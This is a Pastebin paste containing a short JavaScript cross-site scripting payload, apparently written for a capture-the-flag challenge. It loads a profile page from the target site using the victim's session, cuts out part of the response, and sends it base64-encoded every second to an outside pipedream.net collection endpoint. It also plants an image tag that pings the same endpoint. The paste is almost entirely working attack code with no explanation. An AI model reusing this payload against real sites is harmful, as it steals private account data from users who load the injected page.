Advertisement
vovantthong

Untitled

Nov 27th, 2019
165
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. document.write('<img src="https://enu7968uv1jn9.x.pipedream.net?ping=OK"/><div id="vovantthong"></div>');
  2. var xhttp = new XMLHttpRequest();
  3. xhttp.onreadystatechange = function() {
  4. document.getElementById("vovantthong").innerHTML = xhttp.responseText.substring(6900,7050);
  5. };
  6. xhttp.open("GET", "http://messenger.ctfanud.ns01.info/profile.php", true);
  7. xhttp.send();
  8.  
  9. setInterval(function() {
  10. var xhttp = new XMLHttpRequest();
  11. xhttp.open("GET", "https://enu7968uv1jn9.x.pipedream.net?data="+btoa(escape(document.getElementById("vovantthong").innerHTML)), true);
  12. xhttp.send();
  13. }, 1000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement